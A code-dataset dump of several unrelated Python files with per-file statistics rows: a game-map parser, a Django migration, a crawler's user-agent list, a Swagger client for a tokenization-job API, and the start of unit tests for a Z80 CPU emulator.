while(len(score_matrix) < MAX_SIZE):
score_matrix.append([0] * MAX_SIZE)
turns = list(map(int, f.readline().split()))[0]
num_agens = list(map(int, f.readline().split()))[0]
coord_agens_of_team_A = []
coord_agens_of_team_B = []
for j in range(num_agens * 2):
coord = list(map(int, f.readline().split()))
# print(coord)
if(j < num_agens):
coord_agens_of_team_A.append(coord)
else:
coord_agens_of_team_B.append(coord)
num_tresures = list(map(int, f.readline().split()))[0]
treasures = []
for j in range(num_tresures):
coord = list(map(int, f.readline().split()))
treasures.append(coord)
num_walls = list(map(int, f.readline().split()))[0]
coord_walls = []
for j in range(num_walls):
coord = list(map(int, f.readline().split()))
coord_walls.append(coord)
data.append([h, w, score_matrix, coord_agens_of_team_A,
coord_agens_of_team_B, treasures,
coord_walls, turns])
return data
| 38.81982
| 71
| 0.489209
| 505
| 4,309
| 3.928713
| 0.110891
| 0.060484
| 0.070565
| 0.15121
| 0.839718
| 0.818548
| 0.78629
| 0.78629
| 0.78629
| 0.78629
| 0
| 0.012543
| 0.389418
| 4,309
| 111
| 72
| 38.81982
| 0.741543
| 0.005802
| 0
| 0.795699
| 0
| 0
| 0.005606
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021505
| false
| 0
| 0
| 0
| 0.053763
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
207948408ed8442b3a3b2c01e30db44bc89a5789
| 161
|
py
|
Python
|
django_plus/cookie/__init__.py
|
BE360/django-plus
|
4bd09e2636391fb325da2a5dc5ec87e9280a1318
|
[
"MIT"
] | 1
|
2019-09-25T06:48:14.000Z
|
2019-09-25T06:48:14.000Z
|
django_plus/cookie/__init__.py
|
BE360/django-plus
|
4bd09e2636391fb325da2a5dc5ec87e9280a1318
|
[
"MIT"
] | null | null | null |
django_plus/cookie/__init__.py
|
BE360/django-plus
|
4bd09e2636391fb325da2a5dc5ec87e9280a1318
|
[
"MIT"
] | 1
|
2019-04-22T11:49:16.000Z
|
2019-04-22T11:49:16.000Z
|
from django_plus.cookie import cookie_classes
from .cookie_param import CookieParam
from django_plus.cookie import utils
from .manager import get_cookie_handler
| 32.2
| 45
| 0.875776
| 24
| 161
| 5.625
| 0.5
| 0.148148
| 0.207407
| 0.296296
| 0.385185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099379
| 161
| 4
| 46
| 40.25
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2097b7aedd83686ed88baf4500966ec9d0f210e3
| 3,147
|
py
|
Python
|
cmsplugin_ss_grid/migrations/0002_auto_20171211_1043.py
|
alexjbartlett/cmsplugin_ss_grid
|
a377383107c0b71cf98c46229b6044a338dfd88f
|
[
"MIT"
] | null | null | null |
cmsplugin_ss_grid/migrations/0002_auto_20171211_1043.py
|
alexjbartlett/cmsplugin_ss_grid
|
a377383107c0b71cf98c46229b6044a338dfd88f
|
[
"MIT"
] | null | null | null |
cmsplugin_ss_grid/migrations/0002_auto_20171211_1043.py
|
alexjbartlett/cmsplugin_ss_grid
|
a377383107c0b71cf98c46229b6044a338dfd88f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-12-11 10:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cmsplugin_ss_grid', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='container',
name='background_id',
field=models.CharField(blank=True, help_text='ID applied to the background HTML element', max_length=255, null=True, verbose_name='Background ID'),
),
migrations.AddField(
model_name='container',
name='padding_bottom',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Bottom'),
),
migrations.AddField(
model_name='container',
name='padding_left',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Left'),
),
migrations.AddField(
model_name='container',
name='padding_right',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Right'),
),
migrations.AddField(
model_name='container',
name='padding_top',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Top'),
),
migrations.AddField(
model_name='containercell',
name='margin_bottom',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Margin Bottom'),
),
migrations.AddField(
model_name='containercell',
name='margin_left',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Margin Left'),
),
migrations.AddField(
model_name='containercell',
name='margin_right',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Margin Right'),
),
migrations.AddField(
model_name='containercell',
name='margin_top',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Margin Top'),
),
migrations.AddField(
model_name='containercell',
name='padding_bottom',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Bottom'),
),
migrations.AddField(
model_name='containercell',
name='padding_left',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Left'),
),
migrations.AddField(
model_name='containercell',
name='padding_right',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Right'),
),
migrations.AddField(
model_name='containercell',
name='padding_top',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Padding Top'),
),
]
| 38.851852
| 159
| 0.605974
| 332
| 3,147
| 5.560241
| 0.183735
| 0.095341
| 0.161972
| 0.190141
| 0.843445
| 0.827736
| 0.806067
| 0.611051
| 0.611051
| 0.611051
| 0
| 0.021016
| 0.274229
| 3,147
| 80
| 160
| 39.3375
| 0.787215
| 0.021608
| 0
| 0.753425
| 1
| 0
| 0.174577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027397
| 0
| 0.068493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20b22b5d846defee46da9ab47b10995bd1904751
| 756
|
py
|
Python
|
lncrawl/assets/user_agents.py
|
mesmerlord/lncrawler
|
b309e892969ecd3e7c8e68aef70b6614131fcb3c
|
[
"Apache-2.0"
] | 710
|
2018-11-16T13:33:30.000Z
|
2022-03-29T02:25:36.000Z
|
lncrawl/assets/user_agents.py
|
mesmerlord/lncrawler
|
b309e892969ecd3e7c8e68aef70b6614131fcb3c
|
[
"Apache-2.0"
] | 949
|
2018-11-11T16:16:09.000Z
|
2022-03-31T09:56:04.000Z
|
lncrawl/assets/user_agents.py
|
mesmerlord/lncrawler
|
b309e892969ecd3e7c8e68aef70b6614131fcb3c
|
[
"Apache-2.0"
] | 196
|
2018-11-15T17:41:36.000Z
|
2022-03-31T23:13:15.000Z
|
# -*- coding: utf-8 -*-
user_agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Edg/94.0.992.38",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.3",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
]
| 68.727273
| 137
| 0.681217
| 142
| 756
| 3.619718
| 0.28169
| 0.087549
| 0.105058
| 0.18677
| 0.822957
| 0.822957
| 0.822957
| 0.822957
| 0.822957
| 0.822957
| 0
| 0.265337
| 0.137566
| 756
| 10
| 138
| 75.6
| 0.523006
| 0.027778
| 0
| 0
| 0
| 0.75
| 0.907231
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
20cf27ee921ebe0037fcd8169e92e1b0099befe1
| 79
|
py
|
Python
|
src/python/baekjoon/test.py
|
Hyeon9mak/Baekjoon
|
1595eeb260eaf41cc191bd4bbda5a9a2a817f1bd
|
[
"MIT"
] | null | null | null |
src/python/baekjoon/test.py
|
Hyeon9mak/Baekjoon
|
1595eeb260eaf41cc191bd4bbda5a9a2a817f1bd
|
[
"MIT"
] | null | null | null |
src/python/baekjoon/test.py
|
Hyeon9mak/Baekjoon
|
1595eeb260eaf41cc191bd4bbda5a9a2a817f1bd
|
[
"MIT"
] | null | null | null |
M = 26
N = (M%10*10) + (M//10 + M%10)
print(N)
print((1%10*10) + (1//10+1%10))
| 15.8
| 31
| 0.468354
| 20
| 79
| 1.85
| 0.3
| 0.243243
| 0.27027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.323077
| 0.177215
| 79
| 5
| 31
| 15.8
| 0.246154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
459583d31c8fc655bcb42803cd5cf3a5f8af2ab0
| 21,165
|
py
|
Python
|
dxm/lib/masking_api/api/tokenization_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 5
|
2018-08-23T15:47:05.000Z
|
2022-01-19T23:38:18.000Z
|
dxm/lib/masking_api/api/tokenization_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 59
|
2018-10-15T10:37:00.000Z
|
2022-03-22T20:49:25.000Z
|
dxm/lib/masking_api/api/tokenization_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 12
|
2019-03-08T19:59:13.000Z
|
2021-12-16T03:28:04.000Z
|
# coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dxm.lib.masking_api.api_client import ApiClient
class TokenizationJobApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_tokenization_job(self, body, **kwargs): # noqa: E501
"""Create tokenization job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tokenization_job(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TokenizationJob body: The tokenization job to create (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_tokenization_job_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_tokenization_job_with_http_info(body, **kwargs) # noqa: E501
return data
def create_tokenization_job_with_http_info(self, body, **kwargs): # noqa: E501
"""Create tokenization job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tokenization_job_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TokenizationJob body: The tokenization job to create (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_tokenization_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `create_tokenization_job`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenizationJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_tokenization_job(self, tokenization_job_id, **kwargs): # noqa: E501
"""Delete tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tokenization_job(tokenization_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_tokenization_job_with_http_info(tokenization_job_id, **kwargs) # noqa: E501
else:
(data) = self.delete_tokenization_job_with_http_info(tokenization_job_id, **kwargs) # noqa: E501
return data
def delete_tokenization_job_with_http_info(self, tokenization_job_id, **kwargs): # noqa: E501
"""Delete tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tokenization_job_with_http_info(tokenization_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tokenization_job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_tokenization_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'tokenization_job_id' is set
if self.api_client.client_side_validation and ('tokenization_job_id' not in params or
params['tokenization_job_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `tokenization_job_id` when calling `delete_tokenization_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tokenization_job_id' in params:
path_params['tokenizationJobId'] = params['tokenization_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs/{tokenizationJobId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_tokenization_jobs(self, **kwargs): # noqa: E501
"""Get all tokenization jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_tokenization_jobs(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get tokenization jobs. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:param int environment_id: The ID of the environment to get all tokenization jobs from
:return: TokenizationJobList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_tokenization_jobs_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_tokenization_jobs_with_http_info(**kwargs) # noqa: E501
return data
def get_all_tokenization_jobs_with_http_info(self, **kwargs): # noqa: E501
"""Get all tokenization jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_tokenization_jobs_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get tokenization jobs. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:param int environment_id: The ID of the environment to get all tokenization jobs from
:return: TokenizationJobList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_number', 'page_size', 'environment_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_tokenization_jobs" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page_number' in params:
query_params.append(('page_number', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
if 'environment_id' in params:
query_params.append(('environment_id', params['environment_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenizationJobList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tokenization_job_by_id(self, tokenization_job_id, **kwargs): # noqa: E501
"""Get tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tokenization_job_by_id(tokenization_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to get (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tokenization_job_by_id_with_http_info(tokenization_job_id, **kwargs) # noqa: E501
else:
(data) = self.get_tokenization_job_by_id_with_http_info(tokenization_job_id, **kwargs) # noqa: E501
return data
def get_tokenization_job_by_id_with_http_info(self, tokenization_job_id, **kwargs): # noqa: E501
"""Get tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tokenization_job_by_id_with_http_info(tokenization_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to get (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tokenization_job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tokenization_job_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'tokenization_job_id' is set
if self.api_client.client_side_validation and ('tokenization_job_id' not in params or
params['tokenization_job_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `tokenization_job_id` when calling `get_tokenization_job_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tokenization_job_id' in params:
path_params['tokenizationJobId'] = params['tokenization_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs/{tokenizationJobId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenizationJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_tokenization_job(self, tokenization_job_id, body, **kwargs): # noqa: E501
"""Update tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_tokenization_job(tokenization_job_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to update (required)
:param TokenizationJob body: The updated tokenization job (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_tokenization_job_with_http_info(tokenization_job_id, body, **kwargs) # noqa: E501
else:
(data) = self.update_tokenization_job_with_http_info(tokenization_job_id, body, **kwargs) # noqa: E501
return data
def update_tokenization_job_with_http_info(self, tokenization_job_id, body, **kwargs): # noqa: E501
"""Update tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_tokenization_job_with_http_info(tokenization_job_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to update (required)
:param TokenizationJob body: The updated tokenization job (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tokenization_job_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_tokenization_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'tokenization_job_id' is set
if self.api_client.client_side_validation and ('tokenization_job_id' not in params or
params['tokenization_job_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `tokenization_job_id` when calling `update_tokenization_job`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `update_tokenization_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tokenization_job_id' in params:
path_params['tokenizationJobId'] = params['tokenization_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs/{tokenizationJobId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenizationJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.337891
| 142
| 0.625514
| 2,457
| 21,165
| 5.111111
| 0.06919
| 0.114668
| 0.060917
| 0.028667
| 0.944099
| 0.938605
| 0.923475
| 0.90086
| 0.895127
| 0.891782
| 0
| 0.014012
| 0.291897
| 21,165
| 511
| 143
| 41.418787
| 0.823914
| 0.330262
| 0
| 0.781818
| 1
| 0
| 0.192653
| 0.057423
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.014545
| 0
| 0.112727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
45d6008341fea03df718ef9fcc625ed1ec1dd8df
| 86,745
|
py
|
Python
|
tests/test_z80.py
|
zmarvel/slowboy
|
c173343746b425f97d15ad0f25637f345b867fcd
|
[
"MIT"
] | 2
|
2017-01-27T03:38:18.000Z
|
2022-02-18T12:07:26.000Z
|
tests/test_z80.py
|
zmarvel/slowboy
|
c173343746b425f97d15ad0f25637f345b867fcd
|
[
"MIT"
] | 4
|
2017-04-24T02:58:30.000Z
|
2017-04-24T03:13:10.000Z
|
tests/test_z80.py
|
zmarvel/slowboy
|
c173343746b425f97d15ad0f25637f345b867fcd
|
[
"MIT"
] | null | null | null |
import unittest
import slowboy.z80
class TestZ80(unittest.TestCase):
def setUp(self):
self.cpu = slowboy.z80.Z80()
def test_init(self):
self.assertEqual(self.cpu.pc, 0x100)
self.assertEqual(self.cpu.sp, 0xfffe)
self.assertEqual(self.cpu.registers['a'], 0x01)
self.assertEqual(self.cpu.registers['f'], 0xb0)
self.assertEqual(self.cpu.registers['b'], 0x00)
self.assertEqual(self.cpu.registers['c'], 0x13)
self.assertEqual(self.cpu.registers['d'], 0x00)
self.assertEqual(self.cpu.registers['e'], 0xd8)
self.assertEqual(self.cpu.registers['h'], 0x01)
self.assertEqual(self.cpu.registers['l'], 0x4d)
self.assertEqual(self.cpu.state, slowboy.z80.State.STOP)
def test_set_reg8(self):
self.cpu.set_reg8('B', 0)
self.cpu.set_reg8('C', 1)
self.cpu.set_reg8('D', 2)
self.cpu.set_reg8('E', 3)
self.cpu.set_reg8('H', 4)
self.cpu.set_reg8('L', 5)
self.cpu.set_reg8('A', 6)
registers = self.cpu.get_registers()
self.assertEqual(registers['b'], 0)
self.assertEqual(registers['c'], 1)
self.assertEqual(registers['d'], 2)
self.assertEqual(registers['e'], 3)
self.assertEqual(registers['h'], 4)
self.assertEqual(registers['l'], 5)
self.assertEqual(registers['a'], 6)
def test_set_reg8_invalid_argument(self):
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('BC', 0xbc)
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('de', 0xde)
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('HL', 0xbc)
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('sp', 0xde)
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('PC', 0xff)
def test_get_reg8(self):
self.cpu.set_reg8('B', 0)
self.cpu.set_reg8('C', 1)
self.cpu.set_reg8('D', 2)
self.cpu.set_reg8('E', 3)
self.cpu.set_reg8('H', 4)
self.cpu.set_reg8('L', 5)
self.cpu.set_reg8('A', 6)
self.assertEqual(self.cpu.get_reg8('b'), 0)
self.assertEqual(self.cpu.get_reg8('c'), 1)
self.assertEqual(self.cpu.get_reg8('d'), 2)
self.assertEqual(self.cpu.get_reg8('e'), 3)
self.assertEqual(self.cpu.get_reg8('h'), 4)
self.assertEqual(self.cpu.get_reg8('l'), 5)
self.assertEqual(self.cpu.get_reg8('a'), 6)
def test_get_reg8_invalid_argument(self):
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('BC')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('de')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('HL')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('sp')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('PC')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('x')
def test_set_reg16(self):
self.cpu.set_reg16('BC', 0x1234)
self.cpu.set_reg16('DE', 0x3456)
self.cpu.set_reg16('HL', 0x5678)
self.assertEqual(self.cpu.get_reg8('f'), 0xb0)
self.cpu.set_reg16('af', 0xabcd)
self.assertEqual(self.cpu.get_reg8('B'), 0x12)
self.assertEqual(self.cpu.get_reg8('C'), 0x34)
self.assertEqual(self.cpu.get_reg8('D'), 0x34)
self.assertEqual(self.cpu.get_reg8('E'), 0x56)
self.assertEqual(self.cpu.get_reg8('H'), 0x56)
self.assertEqual(self.cpu.get_reg8('L'), 0x78)
self.assertEqual(self.cpu.get_reg8('a'), 0xab)
# f is not writable, so should remain unchanged
self.assertEqual(self.cpu.get_reg8('f'), 0xb0)
def test_get_reg16(self):
self.cpu.set_reg16('BC', 0x1234)
self.cpu.set_reg16('DE', 0x3456)
self.cpu.set_reg16('HL', 0x5678)
self.cpu.sp = 0x7fff
self.assertEqual(self.cpu.get_reg16('BC'), 0x1234)
